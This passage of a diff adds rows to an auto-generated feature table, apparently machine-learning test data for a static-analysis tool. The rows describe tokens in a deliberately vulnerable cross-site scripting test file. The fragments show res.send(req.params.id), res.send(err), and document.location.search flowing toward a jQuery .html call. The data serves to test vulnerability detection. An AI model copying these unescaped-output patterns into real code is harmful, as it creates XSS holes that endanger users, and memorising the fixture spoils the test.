'arguments' object of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:22:194:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:22:194:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res res send req params id err res send err | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:22:194:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:22:194:1 | 'arguments' object of anonymous function | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:22:194:1 | exceptional return of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:22:194:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:22:194:1 | exceptional return of anonymous function | enclosingFunctionBody | req res res send req params id err res send err | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:22:194:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:22:194:1 | exceptional return of anonymous function | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:188:22:194:1 | functio ... s)\\n\\t}\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ExceptionXss/exception-xss.js:188:22:194:1 | functio ... s)\\n\\t}\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ExceptionXss/exception-xss.js:188:22:194:1 | functio ... s)\\n\\t}\\n} | calleeImports | express | @@ -19422,6 +131127,66 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:188:22:194:1 | functio ... s)\\n\\t}\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ExceptionXss/exception-xss.js:188:22:194:1 | functio ... s)\\n\\t}\\n} | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:188:22:194:1 | functio ... s)\\n\\t}\\n} | receiverName | app | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:22:194:1 | return of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:22:194:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:22:194:1 | return of anonymous function | enclosingFunctionBody | req res res send req params id err res send err | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:22:194:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:22:194:1 | return of anonymous function | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:32:188:34 | req | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:32:188:34 | req | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:32:188:34 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:32:188:34 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:32:188:34 | req | enclosingFunctionBody | req res res send req params id err res send err | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:32:188:34 | req | enclosingFunctionBody | req res res send req params id err res send err | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:32:188:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:32:188:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:32:188:34 | req | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:32:188:34 | req | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:37:188:39 | res | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:37:188:39 | res | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:37:188:39 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:37:188:39 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:37:188:39 | res | enclosingFunctionBody | req res res send req params id err res send err | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:37:188:39 | res | enclosingFunctionBody | req res res send req params id err res send err | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:37:188:39 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:37:188:39 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:37:188:39 | res | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:37:188:39 | res | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:3:190:5 | res | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:3:190:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:3:190:5 | res | enclosingFunctionBody | req res res send req params id err res send err | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:3:190:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:3:190:5 | res | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:3:190:10 | res.send | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:3:190:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:3:190:10 | res.send | enclosingFunctionBody | req res res send req params id err res send err | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:3:190:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:3:190:10 | res.send | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:3:190:25 | exceptional return of res.sen ... ams.id) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:3:190:25 | exceptional return of res.sen ... ams.id) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:3:190:25 | exceptional return of res.sen ... ams.id) | enclosingFunctionBody | req res res send req params id err res send err | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:3:190:25 | exceptional return of res.sen ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:3:190:25 | exceptional return of res.sen ... ams.id) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:3:190:25 | res.sen ... ams.id) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:3:190:25 | res.sen ... ams.id) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:3:190:25 | res.sen ... ams.id) | enclosingFunctionBody | req res res send req params id err res send err | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:3:190:25 | res.sen ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:3:190:25 | res.sen ... ams.id) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:7:190:10 | send | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:7:190:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:7:190:10 | send | enclosingFunctionBody | req res res send req params id err res send err | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:7:190:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:7:190:10 | send | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:12:190:14 | req | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:12:190:14 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:12:190:14 | req | enclosingFunctionBody | req res res send req params id err res send err | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:12:190:14 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:12:190:14 | req | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:12:190:21 | req.params | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:12:190:21 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:12:190:21 | req.params | enclosingFunctionBody | req res res send req params id err res send err | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:12:190:21 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:12:190:21 | req.params | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:190:12:190:24 | req.params.id | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ExceptionXss/exception-xss.js:190:12:190:24 | req.params.id | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:190:12:190:24 | req.params.id | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19430,6 +131195,51 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:190:12:190:24 | req.params.id | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ExceptionXss/exception-xss.js:190:12:190:24 | req.params.id | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:190:12:190:24 | req.params.id | receiverName | res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:16:190:21 | params | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:16:190:21 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:16:190:21 | params | enclosingFunctionBody | req res res send req params id err res send err | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:16:190:21 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:16:190:21 | params | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:23:190:24 | id | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:23:190:24 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:23:190:24 | id | enclosingFunctionBody | req res res send req params id err res send err | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:23:190:24 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:190:23:190:24 | id | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:191:10:191:12 | err | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:191:10:191:12 | err | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:191:10:191:12 | err | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:191:10:191:12 | err | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:191:10:191:12 | err | enclosingFunctionBody | req res res send req params id err res send err | +| autogenerated/Xss/ExceptionXss/exception-xss.js:191:10:191:12 | err | enclosingFunctionBody | req res res send req params id err res send err | +| autogenerated/Xss/ExceptionXss/exception-xss.js:191:10:191:12 | err | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:191:10:191:12 | err | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:191:10:191:12 | err | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:191:10:191:12 | err | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:192:3:192:5 | res | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:192:3:192:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:192:3:192:5 | res | enclosingFunctionBody | req res res send req params id err res send err | +| autogenerated/Xss/ExceptionXss/exception-xss.js:192:3:192:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:192:3:192:5 | res | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:192:3:192:10 | res.send | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:192:3:192:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:192:3:192:10 | res.send | enclosingFunctionBody | req res res send req params id err res send err | +| autogenerated/Xss/ExceptionXss/exception-xss.js:192:3:192:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:192:3:192:10 | res.send | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:192:3:192:15 | exceptional return of res.send(err) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:192:3:192:15 | exceptional return of res.send(err) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:192:3:192:15 | exceptional return of res.send(err) | enclosingFunctionBody | req res res send req params id err res send err | +| autogenerated/Xss/ExceptionXss/exception-xss.js:192:3:192:15 | exceptional return of res.send(err) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:192:3:192:15 | exceptional return of res.send(err) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:192:3:192:15 | res.send(err) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:192:3:192:15 | res.send(err) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:192:3:192:15 | res.send(err) | enclosingFunctionBody | req res res send req params id err res send err | +| autogenerated/Xss/ExceptionXss/exception-xss.js:192:3:192:15 | res.send(err) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:192:3:192:15 | res.send(err) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:192:7:192:10 | send | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:192:7:192:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:192:7:192:10 | send | enclosingFunctionBody | req res res send req params id err res send err | +| autogenerated/Xss/ExceptionXss/exception-xss.js:192:7:192:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:192:7:192:10 | send | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:192:12:192:14 | err | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ExceptionXss/exception-xss.js:192:12:192:14 | err | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:192:12:192:14 | err | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19438,12 +131248,124 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:192:12:192:14 | err | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ExceptionXss/exception-xss.js:192:12:192:14 | err | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:192:12:192:14 | err | receiverName | res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:196:5:196:6 | fs | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:196:5:196:6 | fs | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:196:5:196:6 | fs | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:196:5:196:22 | fs = require("fs") | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:196:5:196:22 | fs = require("fs") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:196:5:196:22 | fs = require("fs") | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:196:10:196:16 | require | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:196:10:196:16 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:196:10:196:16 | require | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:196:10:196:22 | exceptional return of require("fs") | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:196:10:196:22 | exceptional return of require("fs") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:196:10:196:22 | exceptional return of require("fs") | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:196:10:196:22 | require("fs") | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:196:10:196:22 | require("fs") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:196:10:196:22 | require("fs") | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:196:18:196:21 | "fs" | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ExceptionXss/exception-xss.js:196:18:196:21 | "fs" | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:196:18:196:21 | "fs" | calleeImports | | | autogenerated/Xss/ExceptionXss/exception-xss.js:196:18:196:21 | "fs" | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | | autogenerated/Xss/ExceptionXss/exception-xss.js:196:18:196:21 | "fs" | contextSurroundingFunctionParameters | | | autogenerated/Xss/ExceptionXss/exception-xss.js:196:18:196:21 | "fs" | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:198:1:216:2 | (functi ... \\t}\\n\\t\\n}) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:198:1:216:2 | (functi ... \\t}\\n\\t\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:198:1:216:2 | (functi ... \\t}\\n\\t\\n}) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:198:1:216:4 | (functi ... \\n\\t\\n})() | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:198:1:216:4 | (functi ... \\n\\t\\n})() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:198:1:216:4 | (functi ... \\n\\t\\n})() | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:198:1:216:4 | exceptional return of (functi ... \\n\\t\\n})() | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:198:1:216:4 | exceptional return of (functi ... \\n\\t\\n})() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:198:1:216:4 | exceptional return of (functi ... \\n\\t\\n})() | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:198:2:198:1 | this | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:198:2:198:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:198:2:198:1 | this | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:198:2:198:1 | this | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:198:2:198:1 | this | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:198:2:216:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:198:2:216:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:198:2:216:1 | 'arguments' object of anonymous function | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:198:2:216:1 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:198:2:216:1 | 'arguments' object of anonymous function | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:198:2:216:1 | exceptional return of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:198:2:216:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:198:2:216:1 | exceptional return of anonymous function | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:198:2:216:1 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:198:2:216:1 | exceptional return of anonymous function | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:198:2:216:1 | functio ... \\n\\t}\\n\\t\\n} | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:198:2:216:1 | functio ... \\n\\t}\\n\\t\\n} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:198:2:216:1 | functio ... \\n\\t}\\n\\t\\n} | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:198:2:216:1 | return of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:198:2:216:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:198:2:216:1 | return of anonymous function | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:198:2:216:1 | return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:198:2:216:1 | return of anonymous function | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:6:199:8 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:6:199:8 | foo | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:6:199:8 | foo | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:6:199:8 | foo | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:6:199:8 | foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:6:199:35 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:6:199:35 | foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:6:199:35 | foo | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:6:199:35 | foo | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:6:199:35 | foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:6:199:35 | foo = d ... .search | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:6:199:35 | foo = d ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:6:199:35 | foo = d ... .search | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:6:199:35 | foo = d ... .search | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:6:199:35 | foo = d ... .search | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:12:199:19 | document | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:12:199:19 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:12:199:19 | document | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| 